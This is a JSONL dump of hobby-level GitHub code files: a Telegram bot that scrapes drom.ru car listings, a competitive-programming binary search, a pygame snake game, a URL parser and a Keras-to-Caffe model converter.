+{"seq_id":"18705878295","text":"from aiogram import types, Dispatcher\nimport Filters as filter\nimport requests\nfrom data_base import sqlite\nimport aiohttp\nimport json\nfrom transliterate import translit\nimport sqlite3 as sq\nfrom bs4 import BeautifulSoup as bs\n\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher.filters import Text\n\nFind_URL = ''\n\nstorage = MemoryStorage()\n# FSM states class\nclass FSMFind(StatesGroup):\n model = State()\n full_model = State()\n year = State()\n country = State()\n radius = State()\n search_parameter = State()\n\n# Entry point\nasync def Find(message: types.Message):\n\tawait FSMFind.model.set()\n\tawait message.answer(\"Введите марку авто\")\n\t\n# Brand\nasync def model(message: types.Message, state: FSMContext):\n mod = message.text\n if await check_brand(mod):\n await message.answer(\"Некорректная марка автомобиля. Попробуйте ещё раз!\")\n await FSMFind.model.set()\n else:\n async with state.proxy() as date:\n date['model'] = message.text\n await FSMFind.next()\n await message.answer(\"Введите модель для подбора авто\")\n\n# Model\nasync def full_model(message: types.Message, state: FSMContext):\n mod = message.text\n mod = mod.title()\n brand = None\n async with state.proxy() as date:\n brand = date['model']\n if await ckek_model(mod, brand):\n await message.answer(\"Некорректная модель автомобиля. 
Попробуйте ещё раз!\")\n await FSMFind.full_model.set()\n else:\n async with state.proxy() as date:\n date ['full_model'] = message.text\n await FSMFind.next()\n await message.answer(\"Введите год автомобиля \\n(Вам будут показаны атвомобили с годом выпуска +1 и -1 от введенного)\")\n\n# Год\nasync def year(message: types.Message, state: FSMContext):\n mod = message.text\n if mod.isdigit():\n async with state.proxy() as date:\n date ['year'] = message.text\n await FSMFind.next()\n await message.answer(\"Введите город для подбора авто\")\n else:\n await message.answer(\"Введены некорректные данные. Попробуйте ещё раз!\")\n await FSMFind.year.set()\n\n# Город\nasync def country_find(message: types.Message, state: FSMContext):\n last_message = await message.answer(\"Запрос обрабатывается...\")\n mod = message.text\n URL_for_find = \".drom.ru/\"\n mod = mod.replace(\"/\", \"\")\n mod = mod.replace(\"\\\\\", \"\")\n country_name = await country(URL_for_find, mod)\n flag = await checker(country_name)\n await last_message.delete()\n if (flag):\n async with state.proxy() as date:\n date ['country'] = country_name\n await FSMFind.next()\n await message.answer(\"Введите радиус поиска\") \n\n else:\n await message.answer(\"Город указан не корректно. \\nПовторите попытку!\")\n await FSMFind.country.set()\n\n \n \n# Радиус\nasync def radius(message: types.Message, state: FSMContext):\n async with state.proxy() as date:\n date ['radius'] = message.text\n if message.text.isdigit():\n await FSMFind.next()\n await message.answer(\"Выберите один из предложенных методов сортировки объявлений\\n1 - Цена-пробег\\n2 - Количество владельцев\\n3 - Наличие ограничений на регистрационные действия\")\n else:\n await message.answer(\"Некорректный формат. \\nВы можете ввести только одно целое число без пробелов и знаков препинания! \\nПовторите попытку!\")\n await FSMFind.radius.set()\n\n# Фильтры\nasync def search_parameter(message: types.Message, state: FSMContext):\n mod = message.text\n if (mod.isdigit()) and (int(mod) > 0) and (int(mod) < 4):\n async with state.proxy() as date:\n date ['search_parameter'] = mod\n if int(mod) == 1:\n await filter.first(message, state)\n elif int(mod) == 2:\n await filter.second(message, state)\n elif int(mod) == 3:\n await filter.third(message, state)\n \n await open_advertisement(message)\n else:\n await message.answer(\"Вы ввели некорректное значение. 
Повторите попытку!\")\n await FSMFind.search_parameter.set()\n\n \n\nasync def pars(message: types.Message, state: FSMContext):\n # ЗАВЕРШЕНИЕ\n global href_car\n href_car = [] \n name_country = None\n name_radius = None\n name_model = None\n name_full_model = None\n name_year = None\n async with state.proxy() as date:\n name_year = date['year']\n name_country = date['country']\n name_radius = date['radius']\n name_model = date['model']\n name_model = translit(name_model, language_code='ru', reversed=True)\n name_model = name_model.replace(\" \", \"_\")\n name_full_model = date['full_model']\n name_full_model = name_full_model.replace(\" \", \"_\")\n name_full_model = translit(name_full_model, language_code='ru', reversed=True)\n int_year = int(name_year)\n min_year = str(int_year - 1)\n max_year = str(int_year + 1)\n cars_after_find = []\n for i in range(1, 6):\n url = name_country.lower() + name_model.lower() + '/' + name_full_model.lower() + \"/page\" + str(i) + '/?distance=' + name_radius + '&maxyear=' + max_year + '&minyear=' + min_year + '&unsold=1'\n r = requests.get(url)\n soup = bs(r.text, 'html.parser')\n first_find = soup.find('div', class_ ='css-1nvf6xk eojktn00')\n second_find = []\n for first in first_find:\n second_find += first.find_all(\"a\", class_ = \"css-xb5nz8 e1huvdhj1\")\n for items in second_find:\n items = items.get('href')\n href_car.append (items)\n if len(href_car) == 0:\n await message.answer (\"По вашему запросу ничего не найдено.\")\n await state.finish()\n\nasync def open_advertisement(message: types.Message):\n f = 9\n\nasync def cancel_handler(message: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await message.answer ('OK')\n\n#РЕГИСТРАТОР \ndef register_handlers_find(dp: Dispatcher):\n dp.register_message_handler(Find, commands = ['поиск', 'Поиск', 'Искать', 'start', 'find'], state = None)\n dp.register_message_handler(model, state = FSMFind.model)\n dp.register_message_handler(full_model, state = FSMFind.full_model)\n dp.register_message_handler(year, state = FSMFind.year)\n dp.register_message_handler(country_find, state = FSMFind.country)\n dp.register_message_handler(radius, state = FSMFind.radius)\n dp.register_message_handler(search_parameter, state = FSMFind.search_parameter)\n dp.register_message_handler(cancel_handler, state=\"*\", commands='отмена')\n dp.register_message_handler(cancel_handler, Text(equals='отмена', ignore_case=True), state=\"*\")\n\nasync def ckek_model(model, brand):\n brand = brand.capitalize()\n model = model.capitalize()\n database_name = 'database.db'\n brand_table_name = \"brand\"\n brand_column_name = \"name_brand\"\n brand_search_value = brand\n\n # Получаем id_brand из таблицы brand\n id_brand_value = get_id_brand(database_name, brand_search_value)\n\n id_brand_value = id_brand_value[0] # Преобразуем кортеж в значение строки\n print (id_brand_value)\n\n model_table_name = \"model\"\n model_column_id = \"id_brand\"\n model_column_name = \"name_model\"\n model_search_value = model\n\n if check_model_exists(database_name, model_table_name, model_column_id, model_column_name, id_brand_value, model_search_value):\n return False\n else:\n return True\n\n\ndef get_id_brand(database, search_value):\n # Устанавливаем соединение с базой данных\n connection = sq.connect(database)\n cursor = connection.cursor()\n\n # Выполняем запрос для получения id_brand\n query = f\"SELECT id_brand FROM brand WHERE name_brand = ?\"\n 
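# A minimal sketch that collapses ckek_model's two lookups above (brand id,
# then model existence) into a single JOIN query, saving one round trip.
# Table and column names follow the SQL above; the same schema is assumed.
import sqlite3 as sq

def model_exists(database, brand, model):
    with sq.connect(database) as connection:
        cursor = connection.execute(
            "SELECT COUNT(*) FROM model m "
            "JOIN brand b ON b.id_brand = m.id_brand "
            "WHERE b.name_brand = ? AND m.name_model = ?",
            (brand.capitalize(), model.capitalize()))
        return cursor.fetchone()[0] > 0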
cursor.execute(query, (search_value,))\n\n # Извлекаем результат запроса\n id_brand = cursor.fetchone()\n\n # Закрываем соединение с базой данных\n cursor.close()\n connection.close()\n\n return id_brand\n\n# ПРОВЕРКА \ndef check_model_exists(database, table, column_id, column_name, id_value, name_value):\n # Устанавливаем соединение с базой данных\n connection = sq.connect(database)\n cursor = connection.cursor()\n\n # Выполняем запрос для проверки существования строки в таблице model\n query = f\"SELECT COUNT(*) FROM {table} WHERE {column_id} = ? AND {column_name} = ?\"\n cursor.execute(query, (id_value, name_value))\n\n # Извлекаем результат запроса\n row_count = cursor.fetchone()[0]\n\n # Закрываем соединение с базой данных\n cursor.close()\n connection.close()\n\n # Проверяем количество строк\n if row_count > 0:\n return True\n else:\n return False\n\n# ПРОВЕРКА МАРКИ\nasync def check_brand(brand):\n brand = brand.capitalize()\n conn = sq.connect('database.db')\n cursor = conn.cursor()\n\n query = f\"SELECT COUNT(*) FROM brand WHERE name_brand = ?\"\n cursor.execute(query, (brand,))\n row_count = cursor.fetchone()[0]\n if row_count > 0:\n return False\n else:\n return True\n\nasync def country(URL_for_find, mess):\n ru_text = mess.lower()\n name_country = ''\n if ru_text.lower() == \"москва\":\n name_country = \"moscow\"\n elif (ru_text.lower() == \"санкт-петербург\") or (ru_text.lower() == \"питер\"):\n name_country = \"spb\"\n else:\n name_country = translit(ru_text, language_code='ru', reversed=True)\n name_country = name_country.replace(\"'\", \"\")\n name_country = name_country.replace(\" \", \"-\")\n ret = (\"https://\" + name_country + URL_for_find) \n print (ret)\n return ret\n\nasync def checker(URL):\n async with aiohttp.ClientSession() as session:\n async with session.get(URL) as response:\n status_code = response.status\n print(status_code)\n print(URL)\n if status_code == 200:\n return True\n else:\n return False\n\n\t\t# # https://moscow.drom.ru/kia/all/page2/\n\t\t# cars_after_find = []\n\t\t# for i in range(1, 6):\n\t\t# \tr = main.requests.get(\"https://\" + name_country + URL_for_find + \"all/page\" + str(i) + \"/\")\n\t\t# \tsoup = main.bs(r.text, 'html.parser')\n\t\t# \tfind_tegs = soup.find_all(\"div\", class_ = \"css-l1wt7n e3f4v4l2\")\n\t\t# \tfor items in find_tegs:\n\t\t# \t\tcars_after_find += items.find_all(\"span\")\n\t\t# clear_c_f = [c.text for c in cars_after_find]\n\t\t# await message.answer(clear_c_f)","repo_name":"Overchenko-Egor/RGR","sub_path":"find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":11639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18311134415","text":"# 문제 정의 : 정해진 개수 c개의 공유기를 최대한 멀리 떨구기\n# => 정해진 거리 미만으로 공유기 설치를 못할 때 공유기 설치 최대 갯수 구하기.\n\nn, c = map(int, input().split())\n\n# 공유기 정보 받기\nlst = [int(input()) for _ in range(n)]\n\nlst.sort()\n\nstart = 1\nend = lst[-1] - lst[0]\n\nresult = 0\n\nwhile (start <= end):\n mid = (start + end) // 2 # 정해진 거리\n\n cnt = 1 # 첫 위치에 무조건 설치\n\n old = lst[0]\n for i in range(1, len(lst)):\n if (lst[i] - old) >= mid: # 정해진 거리보다 짧으면\n cnt += 1 # 설치\n old = lst[i] # 다음 거리 구하기\n \n if cnt >= c: # 공유기를 너무 많이 깔았다 => 정해진 거리 늘려야.\n start = mid + 1\n result = mid\n\n else: # 공유기를 너무 적게 깔았다. 
=> 정해진 거리 줄여야.(너무 규제가 심핟..)\n end = mid - 1\n\nprint(result)","repo_name":"KSY1526/BaekJun_Code_Shape","sub_path":"230213/2110 공유기 설치.py","file_name":"2110 공유기 설치.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18728603412","text":"'''\nCreated on Jul 13, 2021\n\n@author: sohamdigambar\n'''\n\nimport pygame\nimport random\nfrom enum import Enum\nfrom collections import namedtuple\n\npygame.init()\n\nfont = pygame.font.SysFont('arial', 25)\n\nPoint = namedtuple('Point', 'x, y') #this is basically a lightweight class that makes it easier to read coordinates\n\nBLOCK_SIZE = 20 #20 pixels represents 1 snake \"block\"\nSPEED = 15\n\n#RGB colors\nWHITE = (255, 255, 255)\nRED = (200, 0, 0)\nBLUE1 = (0, 0, 255)\nBLUE2 = (0, 100, 255)\nBLACK = (0, 0, 0)\n\n\nclass Direction(Enum):\n RIGHT = 1\n LEFT = 2\n UP = 3\n DOWN = 4\n\nclass SnakeGame:\n \n def __init__(self, width = 640, height = 480):\n self.width = width\n self.height = height\n \n #initialize display\n self.display = pygame.display.set_mode((self.width, self.height))\n pygame.display.set_caption(\"Snake Game\")\n self.clock = pygame.time.Clock()\n \n \n #initialize game state\n self.direction = Direction.RIGHT\n self.head = Point(self.width / 2, self.height / 2) #starts in the center\n self.snake = [self.head, \n Point(self.head.x - BLOCK_SIZE, self.head.y),\n Point(self.head.x - (2 * BLOCK_SIZE), self.head.y)] #creates the snake based on the head position\n self.score = 0\n self.food = None\n self._place_food()\n \n \n \n def _place_food(self):\n x = random.randint(0, (self.width - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n y = random.randint(0, (self.height - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n self.food = Point(x, y)\n if self.food == self.snake:\n self.place_food() #uses recursion to ensure food is NOT spawned in the snake \n \n \n \n def play_step(self):\n #collects user input (direction)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.direction = Direction.LEFT\n elif event.key == pygame.K_RIGHT:\n self.direction = Direction.RIGHT\n elif event.key == pygame.K_UP:\n self.direction = Direction.UP\n elif event.key == pygame.K_DOWN:\n self.direction = Direction.DOWN\n \n #moves snake\n self._move(self.direction) #updates the head\n self.snake.insert(0, self.head)\n \n #checks if game is over\n game_over = False\n if self._is_collision():\n game_over = True\n return game_over, self.score\n \n #places new food or move the snake\n if self.head == self.food:\n self.score += 1\n self._place_food()\n else:\n self.snake.pop()\n \n #updates ui and clock\n self._update_ui()\n self.clock.tick(SPEED)\n \n #returns game over and score \n game_over = False\n return game_over, self.score\n\n\n\n def _update_ui(self):\n self.display.fill(BLACK)\n \n for point in self.snake:\n pygame.draw.rect(self.display, BLUE1, pygame.Rect(point.x, point.y, BLOCK_SIZE, BLOCK_SIZE))\n pygame.draw.rect(self.display, BLUE2, pygame.Rect(point.x + 4, point.y + 4, 12, 12)) #spaces between each snake block\n \n pygame.draw.rect(self.display, RED, pygame.Rect(self.food.x, self.food.y, BLOCK_SIZE, BLOCK_SIZE))\n \n text = font.render(\"Score: \" + str(self.score), True, WHITE)\n self.display.blit(text, [0, 0])\n pygame.display.flip() #allows us to see the changes when we run the update method\n\n\n\n def _is_collision(self):\n #if snake hits 
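# The router-placement solution above binary-searches the answer: a greedy
# pass decides whether a candidate distance is feasible, and the search keeps
# the largest feasible value. The same idea as a reusable template, shown on
# the classic sample input.
def max_feasible(lo, hi, feasible):
    best = 0
    while lo <= hi:
        mid = (lo + hi) // 2
        if feasible(mid):
            best, lo = mid, mid + 1  # mid works; try a larger answer
        else:
            hi = mid - 1             # mid fails; shrink the answer
    return best

def fits(houses, c, d):
    count, last = 1, houses[0]  # always place at the first house
    for x in houses[1:]:
        if x - last >= d:
            count, last = count + 1, x
    return count >= c

houses = sorted([1, 2, 8, 4, 9])
print(max_feasible(1, houses[-1] - houses[0],
                   lambda d: fits(houses, 3, d)))  # 3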
boundary\n if self.head.x > self.width - BLOCK_SIZE or self.head.x < 0 or self.head.y > self.height - BLOCK_SIZE or self.head.y < 0:\n return True\n \n #if snake hits itself\n if self.head in self.snake[1:]:\n return True\n \n return False\n \n \n\n def _move(self, direction):\n x = self.head.x\n y = self.head.y\n \n if direction == Direction.RIGHT:\n x += BLOCK_SIZE\n elif direction == Direction.LEFT:\n x -= BLOCK_SIZE\n elif direction == Direction.UP:\n y -= BLOCK_SIZE\n elif direction == Direction.DOWN:\n y += BLOCK_SIZE\n \n self.head = Point(x, y)\n \n\nif __name__ == '__main__':\n game = SnakeGame()\n \n #game loop\n while True:\n game_over, score = game.play_step()\n \n #break if game over\n if game_over == True:\n break\n \n print('Final Score: ', score)\n \n pygame.quit()","repo_name":"SohamDigambar/PythonProjects","sub_path":"Python game/snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25581176659","text":"# https://atcoder.jp/contests/code-festival-2014-final/tasks/code_festival_final_e\nimport sys\nsys.setrecursionlimit(1 << 25)\nread = sys.stdin.readline\nra = range\nenu = enumerate\n\n\ndef read_ints():\n return list(map(int, read().split()))\n\n\ndef read_a_int():\n return int(read())\n\n\nN = read_a_int()\nR = read_ints()\n\nif N < 3:\n print(0)\n exit()\n\n# 愚直に極大点極小点を列挙すれば良いのでは...\n# また端点は必ず含まれるのだから+2しておけば良い\n# フラットになっている部分は注意→事前に取り除いておけば良い\nRR = []\npre = 10**9\nfor r in R:\n if pre != r:\n RR.append(r)\n pre = r\n\n\nans = 0\nfor i in ra(1, len(RR) - 1):\n pre = RR[i - 1]\n now = RR[i]\n nex = RR[i + 1]\n if pre > now < nex or pre < now > nex:\n ans += 1\n\nprint(ans + 2 if ans != 0 else 0)\n","repo_name":"masakiaota/kyoupuro","sub_path":"practice/green_diff/code_festival_final_e/code_festival_final_e.py","file_name":"code_festival_final_e.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24915619625","text":"from dataclasses import dataclass\nfrom pprint import pprint\nfrom typing import Tuple\nfrom urllib.parse import urlparse, parse_qs, unquote\n\n\n@dataclass\nclass ParsedURL:\n\n controller_path: str\n path: str\n queries: dict[str, list[str]] | None\n\n\ndef parse_url(url: str) -> ParsedURL:\n\n unquoted_url = unquote(url)\n parsed_url = urlparse(unquoted_url)\n queries = parse_qs(parsed_url.query)\n controller, path = _parse_path(parsed_url.path)\n return ParsedURL(controller, path, queries)\n\n\ndef _parse_path(path: str) -> Tuple[str, str]:\n\n if path.startswith(\"/\"):\n path = path[1:]\n\n path_components = path.split(\"/\", 1)\n # Only controller name present\n if len(path_components) == 1:\n return path_components[0], \"\"\n return path_components[0], path_components[1]\n\n\nif __name__ == \"__main__\":\n\n url = \"/controller_name/other-path-related-stuff/blah/blah/blah\"\n parsed_url = parse_url(url)\n print()\n pprint(parsed_url.__dict__)\n print()\n","repo_name":"VisakhChekur/web-framework-py","sub_path":"src/url_parser/url_parser.py","file_name":"url_parser.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21259931068","text":"import os\r\nimport sys\r\ncaffe_root='/home/qxd/workspace/caffeBVLCplus'\r\nsys.path.insert(0,os.path.join(caffe_root,'python'))\r\nimport caffe\r\nfrom caffe import layers as 
L, params as P\r\nimport math\r\nimport numpy as np\r\n\r\ndef set_padding(config_keras, input_shape, config_caffe):\r\n if config_keras['padding'] == 'valid':\r\n return\r\n elif config_keras['padding'] == 'same':\r\n # pad = ((layer.output_shape[1] - 1)*strides[0] + pool_size[0] - layer.input_shape[1])/2\r\n # pad = pool_size[0]/(strides[0]*2)\r\n # pad = (pool_size[0]*layer.output_shape[1] - (pool_size[0]-strides[0])*(layer.output_shape[1]-1) - layer.input_shape[1])/2\r\n \r\n if 'kernel_size' in config_keras:\r\n kernel_size = config_keras['kernel_size']\r\n elif 'pool_size' in config_keras:\r\n kernel_size = config_keras['pool_size']\r\n else:\r\n raise Exception('Undefined kernel size')\r\n pad_w = int(kernel_size[1] / 2)\r\n pad_h = int(kernel_size[0] / 2)\r\n if config_keras['dilation_rate'][0]>1:\r\n pad_w=2\r\n pad_h=2\r\n strides = config_keras['strides']\r\n w = input_shape[1]\r\n h = input_shape[2]\r\n \r\n out_w = math.ceil(w / float(strides[1]))\r\n # pad_w = int((kernel_size[1]*out_w - (kernel_size[1]-strides[1])*(out_w - 1) - w)/2)\r\n \r\n out_h = math.ceil(h / float(strides[0]))\r\n # pad_h = int((kernel_size[0]*out_h - (kernel_size[0]-strides[0])*(out_h - 1) - h)/2)\r\n \r\n if pad_w == 0 and pad_h == 0:\r\n return\r\n \r\n if pad_w == pad_h:\r\n config_caffe['pad'] = pad_w\r\n else:\r\n config_caffe['pad_h'] = pad_h\r\n config_caffe['pad_w'] = pad_w\r\n \r\n else:\r\n raise Exception(config_keras['padding']+' padding is not supported')\r\ndef convert(keras_model, caffe_net_file, caffe_params_file):\r\n caffe_net = caffe.NetSpec()\r\n net_params = dict()\r\n outputs = dict()\r\n shape = ()\r\n input_str = ''\r\n\r\n for layer in keras_model.layers:\r\n name = layer.name\r\n print('processing'+name+\"================================================================================\")\r\n layer_type = type(layer).__name__\r\n config = layer.get_config()\r\n blobs = layer.get_weights()\r\n blobs_num = len(blobs)\r\n\r\n top2='qinxiao'\r\n if type(layer.output) == list:\r\n # raise Exception('Layers with multiply outputs are not supported')\r\n top=layer.output[0].name\r\n else: \r\n top = layer.output.name\r\n \r\n if type(layer.input) != list:\r\n bottom = layer.input.name\r\n \r\n # data\r\n if layer_type == 'InputLayer' or not hasattr(caffe_net, 'data'):\r\n input_name = 'data'\r\n caffe_net[input_name] = L.Layer()\r\n input_shape = config['batch_input_shape']\r\n input_str = 'input: {}\\ninput_dim: {}\\ninput_dim: {}\\ninput_dim: {}\\ninput_dim: {}'.format('\"' + input_name + '\"',\r\n 1, input_shape[3], input_shape[1], input_shape[2])\r\n outputs[layer.input.name] = input_name\r\n if layer_type == 'InputLayer':\r\n continue\r\n # conv\r\n if layer_type == 'Conv2D' or layer_type == 'Convolution2D':\r\n strides = config['strides']\r\n kernel_size = config['kernel_size']\r\n dilation=config['dilation_rate']\r\n kwargs = {'num_output': config['filters']}\r\n \r\n if dilation[0]==dilation[1]:\r\n kwargs['dilation'] = dilation[0]\r\n if kernel_size[0] == kernel_size[1]:\r\n kwargs['kernel_size'] = kernel_size[0]\r\n else:\r\n kwargs['kernel_h'] = kernel_size[0]\r\n kwargs['kernel_w'] = kernel_size[1]\r\n \r\n if strides[0] == strides[1]:\r\n kwargs['stride'] = strides[0]\r\n else:\r\n kwargs['stride_h'] = strides[0]\r\n kwargs['stride_w'] = strides[1]\r\n \r\n if not config['use_bias']:\r\n kwargs['bias_term'] = False\r\n # kwargs['param']=[dict(lr_mult=0)]\r\n else:\r\n # kwargs['param']=[dict(lr_mult=0), dict(lr_mult=0)]\r\n pass\r\n \r\n set_padding(config, 
layer.input_shape, kwargs)\r\n \r\n caffe_net[name] = L.Convolution(caffe_net[outputs[bottom]], **kwargs)\r\n\r\n blobs[0] = np.array(blobs[0]).transpose(3, 2, 0, 1)\r\n net_params[name] = blobs\r\n\r\n if config['activation'] == 'relu':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.ReLU(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'sigmoid':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.Sigmoid(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'tanh':\r\n caffe_net[name_s] = L.TanH(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'linear':\r\n pass\r\n else:\r\n raise Exception('Unsupported activation '+config['activation'])\r\n elif layer_type == 'Conv2DTranspose':\r\n \r\n # Stride\r\n if layer.strides is None:\r\n strides = (1, 1)\r\n else:\r\n strides = layer.strides\r\n use_bias = config['use_bias']\r\n param = dict(bias_term=use_bias)\r\n\r\n # Padding\r\n if layer.padding == 'same': # Calculate the padding for 'same'\r\n padding = [layer.kernel_size[0] / 2, layer.kernel_size[1] / 2]\r\n else:\r\n padding = [0, 0] # If padding is valid(aka no padding)\r\n\r\n \r\n param['pad']=padding[0]\r\n if strides[0]==2:\r\n param['pad']=0\r\n param['kernel_size']=layer.kernel_size[0]\r\n param['stride']=strides[0]\r\n param['num_output']=layer.filters\r\n\r\n # if strides[0] == strides[1]:\r\n # kwargs['stride'] = strides[0]\r\n # else:\r\n # kwargs['stride_h'] = strides[0]\r\n # kwargs['stride_w'] = strides[1]\r\n caffe_net[name] = L.Deconvolution(caffe_net[outputs[bottom]],\r\n convolution_param=param)\r\n \r\n # caffe_net[name] = L.Deconvolution(caffe_net[outputs[bottom]], **kwargs)\r\n\r\n blobs[0] = np.array(blobs[0]).transpose(3, 2, 0, 1)\r\n net_params[name] = blobs\r\n\r\n if config['activation'] == 'relu':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.ReLU(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'sigmoid':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.Sigmoid(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'tanh':\r\n caffe_net[name_s] = L.TanH(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'linear':\r\n pass\r\n else:\r\n raise Exception('Unsupported activation '+config['activation'])\r\n \r\n if name=='Deconv_2':\r\n name_crop = name+'_crop'\r\n caffe_net.data1 = L.Input(shape=dict(dim=[1, 512, 90, 90]))\r\n caffe_net[name_crop] = L.Crop(caffe_net[name], caffe_net.data1, axis=1, offset=0)\r\n if name=='Deconv_3':\r\n name_crop = name+'_crop'\r\n caffe_net.data2 = L.Input(shape=dict(dim=[1, 256, 180, 180]))\r\n caffe_net[name_crop] = L.Crop(caffe_net[name], caffe_net.data2, axis=1, offset=0)\r\n elif layer_type == 'BatchNormalization':\r\n param = dict()\r\n variance = np.array(blobs[-1])\r\n mean = np.array(blobs[-2])\r\n # print('blobs'+str(blobs_num))\r\n # print(blobs)\r\n\r\n # print('config')\r\n # print(config)\r\n if config['scale']:\r\n gamma = np.array(blobs[0])\r\n sparam = [dict(lr_mult=1), dict(lr_mult=1)]\r\n else:\r\n gamma = np.ones(mean.shape, dtype=np.float32)\r\n # sparam = [dict(lr_mult=0, decay_mult=0), dict(lr_mult=1, decay_mult=1)]\r\n sparam = [dict(lr_mult=0), dict(lr_mult=1)]\r\n # sparam = [dict(lr_mult=0), dict(lr_mult=0)]\r\n \r\n if config['center']:\r\n beta = np.array(blobs[-3])\r\n param['bias_term'] = True\r\n else:\r\n beta = np.zeros(mean.shape, dtype=np.float32)\r\n param['bias_term'] = False\r\n \r\n # caffe_net[name] = L.BatchNorm(caffe_net[outputs[bottom]], moving_average_fraction=layer.momentum, eps=layer.epsilon)\r\n 
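# A tiny numeric check of the transform that the BatchNormalization branch
# below maps onto Caffe: BatchNorm carries (mean, variance, scale factor) and
# the paired Scale layer carries (gamma, beta). The values are invented.
import numpy as np

x = np.array([0.5, 1.5, -2.0], dtype=np.float32)
gamma, beta = 1.2, 0.1           # Scale layer parameters
mean, var, eps = 0.4, 0.9, 1e-5  # BatchNorm statistics
print(gamma * (x - mean) / np.sqrt(var + eps) + beta)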
caffe_net[name] = L.BatchNorm(caffe_net[outputs[bottom]], moving_average_fraction=layer.momentum, eps=layer.epsilon)\r\n \r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=1, decay_mult=1), dict(lr_mult=0, decay_mult=0)])\r\n # param = [dict(lr_mult=1), dict(lr_mult=1), dict(lr_mult=0)])\r\n \r\n net_params[name] = (mean, variance, np.array(1.0)) \r\n \r\n name_s = name+'_scale'\r\n \r\n caffe_net[name_s] = L.Scale(caffe_net[name], in_place=True, param=sparam, scale_param={'bias_term': config['center']})\r\n \r\n net_params[name_s] = (gamma, beta)\r\n elif layer_type == 'Activation':\r\n if config['activation'] == 'relu':\r\n # caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]], in_place=True)\r\n if len(layer.input.consumers()) > 1:\r\n caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]])\r\n else:\r\n caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]], in_place=True)\r\n elif config['activation'] == 'tanh':\r\n if len(layer.input.consumers()) > 1:\r\n caffe_net[name] = L.TanH(caffe_net[outputs[bottom]])\r\n else:\r\n caffe_net[name] = L.TanH(caffe_net[outputs[bottom]], in_place=True)\r\n elif config['activation'] == 'relu6':\r\n caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]])\r\n elif config['activation'] == 'softmax':\r\n caffe_net[name] = L.Softmax(caffe_net[outputs[bottom]], in_place=True)\r\n else:\r\n raise Exception('Unsupported activation '+config['activation'])\r\n \r\n elif layer_type == 'MaxPooling2D':\r\n kwargs={}\r\n kwargs['pool'] = P.Pooling.MAX \r\n # config['padding']='same'\r\n pool_size = (3,3)\r\n strides = (2,2)\r\n config['pool_size']=pool_size\r\n config['strides']=strides\r\n if pool_size[0] != pool_size[1]:\r\n raise Exception('Unsupported pool_size')\r\n \r\n if strides[0] != strides[1]:\r\n raise Exception('Unsupported strides')\r\n caffe_net[name] = L.Pooling(caffe_net[outputs[bottom]], kernel_size=pool_size[0], stride=strides[0], **kwargs)\r\n\r\n elif layer_type=='MaxUnpooling2D':\r\n kwargs={}\r\n kwargs['unpool'] = P.Pooling.MAX \r\n # config['padding']='same'\r\n unpool_size = (3,3)\r\n strides = (2,2)\r\n config['unpool_size']=unpool_size\r\n config['strides']=strides\r\n if unpool_size[0] != unpool_size[1]:\r\n raise Exception('Unsupported unpool_size')\r\n \r\n if strides[0] != strides[1]:\r\n raise Exception('Unsupported strides')\r\n caffe_net[name] = L.Unpooling(caffe_net[outputs[bottom]], unpool=P.Unpooling.MAX,kernel_size=3, unpool_h=360,unpool_w=360)\r\n\r\n elif layer_type == 'Add':\r\n layers = []\r\n for i in layer.input:\r\n layers.append(caffe_net[outputs[i.name]])\r\n caffe_net[name] = L.Eltwise(*layers)\r\n else:\r\n raise Exception('Unsupported layer type: '+layer_type)\r\n outputs[top] = name\r\n if name=='Deconv_2':\r\n outputs[top] = name+'_crop'\r\n if name=='Deconv_3':\r\n outputs[top] = name+'_crop'\r\n net_proto = input_str + '\\n' + 'layer {' + 'layer {'.join(str(caffe_net.to_proto()).split('layer {')[2:])\r\n\r\n f = open(caffe_net_file, 'w') \r\n f.write(net_proto)\r\n print("prototxt is done!")\r\n f.close()\r\n \r\n caffe_model = caffe.Net(caffe_net_file, caffe.TEST)\r\n \r\n for layer in caffe_model.params.keys():\r\n if 'up_sampling2d' in layer:\r\n continue\r\n for n in range(0, len(caffe_model.params[layer])):\r\n print('layer:', layer)\r\n print("n:", n)\r\n print((caffe_model.params[layer][n].data[...]).shape)\r\n print((net_params[layer][n]).shape)\r\n caffe_model.params[layer][n].data[...] 
